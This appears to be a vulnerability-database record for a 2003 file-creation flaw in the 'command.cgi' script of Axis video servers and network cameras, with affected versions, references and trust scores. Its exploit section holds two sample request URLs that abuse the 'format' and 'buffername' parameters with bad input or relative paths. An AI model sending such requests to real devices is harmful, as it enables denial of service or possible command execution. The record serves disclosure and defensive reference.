ID
VAR-E-200302-0118
EDB ID
22311
TITLE
Axis Communications Video Server 2.x - 'Command.cgi' File Creation - CGI remote Exploit
Trust: 0.6
DESCRIPTION
Axis Communications Video Server 2.x - 'Command.cgi' File Creation. Remote exploit for CGI platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | axis | model: | communications video server | scope: | eq | version: | 2.x | Trust: 1.0 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.33 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.20 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.20 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.32 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/6987/info
It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.
http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]
http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'Command.cgi' File Creation
Trust: 1.0
CREDITS
Martin Eiszner
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 6987 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 22311 | Trust: 1.6 |
db: | EDBNET | id: | 44503 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/6987/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/22311/ | Trust: 0.6 |
url: | http://www.axis.com/products/camera_servers/index.htm | Trust: 0.3 |
SOURCES
db: | BID | id: | 6987 |
db: | EXPLOIT-DB | id: | 22311 |
db: | EDBNET | id: | 44503 |
LAST UPDATE DATE
2022-07-27T09:48:56.515000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 6987 | date: | 2003-02-28T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 6987 | date: | 2003-02-28T00:00:00 |
db: | EXPLOIT-DB | id: | 22311 | date: | 2003-02-28T00:00:00 |
db: | EDBNET | id: | 44503 | date: | 2003-02-28T00:00:00 |